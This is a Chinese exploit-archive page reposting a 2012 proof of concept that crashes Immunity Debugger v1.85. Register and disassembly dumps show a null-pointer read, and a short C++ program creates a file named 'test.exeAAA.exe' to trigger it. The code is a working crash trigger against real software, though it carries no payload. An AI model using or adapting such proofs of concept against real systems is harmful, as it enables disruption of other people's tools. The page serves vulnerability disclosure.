首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Immunity Debugger v1.85 32-bit Memmory Corruption 来源：facebook.com/Ayrbyte 作者：Ayrbyte 发布时间：2012-06-08   //////////////////////////////////////////////////////////////////////////////// //Title: Immunity Debugger v1.85 32-bit Memmory Corruption //Author: Ayrbyte //Link: debugger.immunityinc.com //Versi: v1.85 //Tested on: Windows 7 //Fb: facebook.com/Ayrbyte //Greetz To : R31tuz, 3|_^^1x, XerkusR, Clan X-BX, and all CREMY Family // //    ??  %%  %% $$$$$        >>  > ::    ;;;;;;;; //   ?? ?  %% %% $$ $$ ||      >> > ::    ;;    ;; //  ?????   %%%% $$$$$ ||___    >>> ::::: ;;;;;;; // ??   ??    %% $$$$  ||  ||     > ::    ;; //      %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;; //    ______________>>Ayrbyte<<_______________ //   Gamerz From CREMY | CRazy Experience arMY //////////////////////////////////////////////////////////////////////////////// //[register] //EAX 00000000 //ECX 00000000 //EDX 0022DFE0 //EBX 0022DB70 ASCII ".exe" //ESP 0022C0C4 //EBP 0022D864 ASCII "test.exe" //ESI 0022DFB8 ASCII "C:\Users\R1d3Rw13c\Desktop\test.exeAAA.exe" //EDI 0022DFDB ASCII ".exe" //EIP 777E49F6 ntdll.777E49F6 // //[diassembly] //779349D4   test        ecx,3 //779349DA   je          779349F6 //779349DC   mov         al,byte ptr [ecx] //779349DE   add         ecx,1 //779349E1   test        al,al //779349E3   je          77934A2B //779349E5   test        ecx,3 //779349EB   jne         779349DC //779349ED   add         eax,0 //779349F0   lea         esp,[esp] //779349F3   lea         esp,[esp] //779349F6   mov         eax,dword ptr [ecx]; ECX=00000000 ds:[00000000]=??? <--NullPointer //779349F8   mov         edx,7EFEFEFFh //779349FD   add         edx,eax //779349FF   xor         eax,0FFh //77934A02   xor         eax,edx //77934A04   add         ecx,4 //77934A07   test        eax,81010100h //77934A0C   je          779349F6 //77934A0E   mov         eax,dword ptr [ecx-4] // //Unhandle exception in ImmunityDebugger.exe (NTDLL.DLL):0xC0000005: Access Violation //immunity is not handle filename test.exeAAA, after .exe "AAA" is also as input, //in offset 779349f6 eax,dword ptr [ecx]; ecx is 00000000 ds:[00000000]=??? <--NullPointer //it makes program be crash //////////////////////////////////////////////////////////////////////////////// #include <iostream> using namespace std; char _isi[] =   "\x43\x52\x45\x4D\x59\x20\x7C\x20\x43\x52\x61\x7A\x79\x20"                 "\x45\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x20\x61\x72\x4D\x59"; int main(){     //make file test.exeAAA.exe, run it on immunity debugger     FILE *_file;     #define _namefile "test.exeAAA.exe"     _file = fopen(_namefile, "w");     fputs(_isi, _file);     fclose(_file);     return 0;   }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Lattice Semiconductor PAC-Desi ·Samsung NET-i viewer Multiple ·Microsoft Windows OLE Object F ·Microsoft IIS MDAC msadcs.dll ·Audio Editor Master 5.4.1.217 ·Microsoft IIS MDAC msadcs.dll ·Snort 2 DCE/RPC preprocessor B ·Sielco Sistemi Winlog 2.07.14 ·Apache Struts <= 2.2.1.1 Remot ·ComSndFTP Server 1.3.7 Beta Re ·Sysax <= 5.60 Create SSL Certi ·Sielco Sistemi Winlog Buffer O   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved